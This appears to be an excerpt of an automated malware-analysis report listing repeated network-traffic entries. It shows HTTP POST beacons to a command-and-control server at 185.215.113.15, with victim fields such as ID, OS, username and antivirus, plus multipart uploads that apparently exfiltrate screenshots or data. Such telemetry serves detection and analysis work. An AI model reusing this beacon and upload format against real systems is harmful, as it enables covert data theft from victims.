    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----902c296e891d8e76557eb09453b58741Host: 185.215.113.15Content-Length: 99573Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----d51656dda67009af4d34db106d3e2a75Host: 185.215.113.15Content-Length: 95758Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
    Source: global trafficHTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
